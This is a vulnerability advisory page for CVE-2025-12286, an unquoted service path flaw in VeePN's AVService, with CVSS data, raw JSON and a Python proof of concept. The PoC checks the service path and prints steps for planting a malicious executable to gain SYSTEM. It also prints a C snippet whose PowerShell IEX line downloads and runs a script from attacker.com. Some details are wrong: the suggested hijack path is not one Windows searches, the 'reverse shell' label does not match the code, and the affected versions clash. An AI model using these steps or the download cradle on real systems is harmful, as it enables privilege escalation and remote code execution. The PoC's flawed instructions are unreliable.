Security Vulnerability Report
中文
CVE-2025-12286 CVSS 7.0 HIGH

CVE-2025-12286

Published: 2025-10-27 14:15:40
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A weakness has been identified in VeePN up to 1.6.2. This affects an unknown function of the file C:\Program Files (x86)\VeePN\avservice\avservice.exe of the component AVService. This manipulation causes unquoted search path. The attack requires local access. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

VeePN < 1.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12286 PoC - VeePN AVService Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in VeePN AVService # Author: Security Researcher # Date: 2025-10-27 import os import sys import subprocess import shutil def check_vulnerability(): """ Check if VeePN AVService is installed and has unquoted path vulnerability """ print("[*] Checking for VeePN AVService vulnerability...") try: # Query Windows service configuration result = subprocess.run( ['sc', 'qc', 'VeePN_AVService'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print("[+] VeePN AVService found") # Extract the binary path for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[+] Binary path: {path}") # Check if path is unquoted and contains spaces if ' ' in path and not (path.startswith('"') and path.endswith('"')): print("[!] VULNERABLE: Path contains spaces without quotes") return True, path else: print("[-] NOT VULNERABLE: Path is properly quoted") return False, path else: print("[-] VeePN AVService not found") return False, None except Exception as e: print(f"[-] Error checking service: {e}") return False, None def exploit_veePN(): """ Exploit unquoted service path to gain SYSTEM privileges WARNING: This is for educational/testing purposes only """ print("[*] Exploitation requires:") print(" 1. Low-privileged user access") print(" 2. Write access to intermediate directories") print(" 3. Ability to restart the service") # Generate malicious executable path # For path: C:\Program Files (x86)\VeePN\avservice\avservice.exe # Attacker can place malicious.exe in: C:\Program Files (x86).exe print("\n[*] To exploit:") print(" 1. Create a malicious executable (e.g., revshell.exe)") print(" 2. Place it at: C:\\Program Files (x86).exe") print(" 3. Wait for service restart or reboot") print(" 4. The malicious code will execute with SYSTEM privileges") return True if __name__ == '__main__': is_vulnerable, path = check_vulnerability() if is_vulnerable: exploit_veePN() # Example malicious code that could be used (reverse shell) print("\n[*] Example malicious code structure:") print(''' // Simple reverse shell example #include <windows.h> #include <stdio.h> int main() {{ STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); // Connect back to attacker machine system("cmd.exe /c powershell -c \"IEX(New-Object Net.WebClient).downloadstring('http://attacker.com/shell.ps1')\""); return 0; }} ''')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12286", "sourceIdentifier": "[email protected]", "published": "2025-10-27T14:15:40.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in VeePN up to 1.6.2. This affects an unknown function of the file C:\\Program Files (x86)\\VeePN\\avservice\\avservice.exe of the component AVService. This manipulation causes unquoted search path. The attack requires local access. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "baseScore": 6.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 1.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/VeePn.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329954", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329954", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.672512", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.682569", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.